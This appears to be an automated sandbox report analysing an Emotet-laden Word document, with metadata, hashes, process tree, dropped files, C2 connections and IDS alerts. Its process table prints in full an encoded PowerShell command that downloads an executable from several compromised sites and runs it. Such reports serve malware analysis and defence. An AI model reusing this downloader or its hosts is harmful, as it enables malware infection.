File name: | message_1216179.doc |
Full analysis: | https://app.any.run/tasks/1b111c32-f4cf-4d70-9fc3-985ae1241caf |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 14:01:24 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: index, Subject: Small Rubber Fish, Author: Darren Carroll, Keywords: firewall, Comments: Principal, Template: Normal.dotm, Last Saved By: Kali VonRueden, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 22:38:00 2019, Last Saved Time/Date: Tue Oct 8 22:38:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 168, Security: 0 |
MD5: | BFBA40723D413F7B5DE9B654B7CF0BCC |
SHA1: | A451F5FE17B43028D79C088649306D93879D9028 |
SHA256: | BE70C7C61FF2B6369ADE37C27334DFD2FFF3DCC6E02E571686EDBE38BD667008 |
SSDEEP: | 6144:7GdugI0As3MXPxTqfVC6qYn4JH1O5DeWje6:7GdugIy3WxTqfcNNJH0FeWj |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Erdman |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 196 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Abernathy - Langosh |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 168 |
Words: | 29 |
Pages: | 1 |
ModifyDate: | 2019:10:08 21:38:00 |
CreateDate: | 2019:10:08 21:38:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Kali VonRueden |
Template: | Normal.dotm |
Comments: | Principal |
Keywords: | firewall |
Author: | Darren Carroll |
Subject: | Small Rubber Fish |
Title: | index |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3048 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\message_1216179.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2392 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADEAYgAzAHgAMQA3ADkANgBjADMAPQAnAHgAYwAyADcANQAyADEANQAwADcANQAwADAAJwA7ACQAeAA4ADAAOAB4ADAAOQAwAHgAYwAwAGMAYwAgAD0AIAAnADgANQAyACcAOwAkAGMANQBjADgANwAwADgAYgA4ADcANgA4AD0AJwBiADgAMAAwADYAMAAwAGMAOQAwADQAJwA7ACQAYgA4AGIAOAA2ADgAMwAyADAAeAAwAGMAeAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAeAA4ADAAOAB4ADAAOQAwAHgAYwAwAGMAYwArACcALgBlAHgAZQAnADsAJABiADgANQAxADQANgBjADAAOQAxADIAMQA9ACcAeAAwADAAOQA2ADYANgBiADAAMAAwADIAJwA7ACQAeAAxADgAMAB4ADAANQA5AGMAMwBjAGMANwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBlAFQALgBXAGUAYgBDAGwASQBlAE4AVAA7ACQAeAB4ADMAMAA1ADcAMQA3ADAAOQAzAD0AJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAGsAdQBsAGwAYgBhAGwAaQAuAGMAbwBtAC8AYgBrAC4AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMAMQAxAC8AQABoAHQAdABwADoALwAvAGMAaABlAGUAbQBhAHQAcgBhAG4AcwB4AHAAcgBlAHMAcwBpAG4AYwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcwBoAG0ANQBkAGoAbAA0ADYAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AYQBjAGUAbwBuAHQAaABlAHIAbwBvAGYALgBjAG8AbQAvAGkAMABvAG4AaQAvAGcAegB4ADUANQA1ADAALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAGcAeABiAHkAZABhAG0AbwBuAGkAcQB1AGUALgBjAG8AbQAvAGYAcgA0AGoAdAAvAGMAYQBjAGgAZQAvAGkAbgBpAHQALgB1AHAAcABlAHIALwBoADgAOQAxADQALwBAAGgAdAB0AHAAcwA6AC8ALwBhAGEAcABsAGkAbgBkAGkAYQAuAGMAbwBtAC8AaABhAHIAZABlAHIALgBpAG4AYwAvAG8AZAB3ADgAeAB0AGgAOQA2AC8AJwAuACIAcwBgAHAAbABJAFQAIgAoACcAQAAnACkAOwAkAGIAOQAxADIAMAAzAHgANAAxADMAYgBjADAAPQAnAGIAOAA4AHgANAA4ADIAMABjADAAMQAwADYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGMAMQA4ADMAYgA1ADgAYgB4ADUAYwA3ADIAIABpAG4AIAAkAHgAeAAzADAANQA3ADEANwAwADkAMwApAHsAdAByAHkAewAkAHgAMQA4ADAAeAAwADUAOQBjADMAYwBjADcALgAiAGQAYABPAFcATgBMAE8AYQBgAGQARgBgAEkAbABlACIAKAAkAGMAMQA4ADMAYgA1ADgAYgB4ADUAYwA3ADIALAAgACQAYgA4AGIAOAA2ADgAMwAyADAAeAAwAGMAeAApADsAJAB4AGIAMwA1ADEAMAAwAHgAMwBjADUAMAA9ACcAYgAzADkAMAAyADIAMgAyADEAMAB4ADIAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABiADgAYgA4ADYAOAAzADIAMAB4ADAAYwB4ACkALgAiAGwAYABlAG4ARwBUAEgAIgAgAC0AZwBlACAAMwA4ADUAMgA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABBAGAAUgBUACIAKAAkAGIAOABiADgANgA4ADMAMgAwAHgAMABjAHgAKQA7ACQAYgA0ADUANgAwAGIAeAAwADIAMgAwADUAPQAnAGMAMAAwADcAMgA2ADUANQAwADEANwAxACcAOwBiAHIAZQBhAGsAOwAkAGIANQAwAHgAMAA3ADkAOQAwADIAMAA0ADcAPQAnAGMANQAwADcAMAAzADAAMQA5ADgANgAwACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHgAMAA2AGIAYwAzADAAMwAwADYAYgA3AD0AJwBiADgAMAAwADAAeAAxADAAMAA3AGIANgA4ACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2660 | "C:\Users\admin\852.exe" | C:\Users\admin\852.exe | — | powershell.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
3376 | --517807f3 | C:\Users\admin\852.exe | 852.exe | |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
2984 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 852.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
3708 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR113D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2392 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P0IGWLR179E2ZJGST3CZ.temp | — | |
MD5:— | SHA256:— | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:5998FFEE3B74A8C71A1DEBE3DAB0B9D7 | SHA256:CDF6E53DBFF3C20512815ADE568A2735CEA468729D907990B0EFDD851AF404C2 | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:A6A4EEDFEFAE6442185BF4A2BEBEA615 | SHA256:B501476C56221374704CAD60147BAAAD895F2DB8578C18AC152B4EDEAB187558 | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D97C51B9.wmf | wmf | |
MD5:4EC0E3CACF0CC0073C8EC3508A0E0E93 | SHA256:803E86A3B127120803AABAAD30BCEC1C6D570BA9C05042E39E5854AE5554D304 | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45340615.wmf | wmf | |
MD5:260D2778748827F02409AC86EDDD7C74 | SHA256:733AAAB2F6C6BB10C3A242A495444AC95A8C46D81C1B2DA9EDB09F37D4757FC9 | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EF0DC66.wmf | wmf | |
MD5:041CC39E7650F8EA2DD9A566CC54B3C1 | SHA256:A59DF65FBC21781BD8C99B574CFD1F047EFE8233C38E4FF506891C99F2F701B4 | |||
2392 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:A670ADD3BF0A1901BD12CC7C4CD70086 | SHA256:98E5263D6949B8F81010D65760BB299D37BCF272CE0FFDF5668E2D5CC1545986 | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\message_1216179.doc.LNK | lnk | |
MD5:E37EF646237B8213D590BDC43F08791A | SHA256:8C125F74BD7E096E18A78195A8B2C8E91969F72B4CF9BE27190554FBC5C2A4A2 | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D61DAD12.wmf | wmf | |
MD5:B80958B525ECF44502319D29255439F7 | SHA256:5109722DBD16D7F277DD4DF7F05CAF304E177D93A6A253066193AF2F474FA74B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3708 | msptermsizes.exe | POST | — | 68.183.190.199:8080 | http://68.183.190.199:8080/entries/balloon/ringin/ | US | — | — | malicious |
3708 | msptermsizes.exe | POST | — | 91.83.93.105:8080 | http://91.83.93.105:8080/badge/guids/ringin/ | HU | — | — | malicious |
3708 | msptermsizes.exe | POST | — | 216.98.148.181:8080 | http://216.98.148.181:8080/badge/publish/ringin/merge/ | US | — | — | malicious |
2392 | powershell.exe | GET | 200 | 166.62.10.52:80 | http://cheematransxpressinc.com/wp-includes/shm5djl4638/ | US | executable | 612 Kb | suspicious |
3708 | msptermsizes.exe | POST | — | 139.5.237.27:443 | http://139.5.237.27:443/symbols/enable/ringin/ | IN | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3708 | msptermsizes.exe | 91.83.93.105:8080 | — | Invitech Megoldasok Zrt. | HU | malicious |
2392 | powershell.exe | 148.72.197.244:443 | www.skullbali.com | — | US | unknown |
3708 | msptermsizes.exe | 216.98.148.181:8080 | — | CariNet, Inc. | US | malicious |
2392 | powershell.exe | 166.62.10.52:80 | cheematransxpressinc.com | GoDaddy.com, LLC | US | suspicious |
3708 | msptermsizes.exe | 68.183.190.199:8080 | — | DSL Extreme | US | malicious |
3708 | msptermsizes.exe | 119.159.150.176:443 | — | Pakistan Telecom Company Limited | PK | malicious |
3708 | msptermsizes.exe | 5.196.35.138:7080 | — | OVH SAS | FR | malicious |
3708 | msptermsizes.exe | 81.213.215.216:50000 | — | Turk Telekom | TR | malicious |
3708 | msptermsizes.exe | 139.5.237.27:443 | — | Syscon Infoway Pvt. Ltd. | IN | malicious |
Domain | IP | Reputation |
---|---|---|
www.skullbali.com |
| unknown |
cheematransxpressinc.com |
| suspicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
2392 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2392 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2392 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3708 | msptermsizes.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
3708 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3708 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3708 | msptermsizes.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 21 |
3708 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3708 | msptermsizes.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 3 |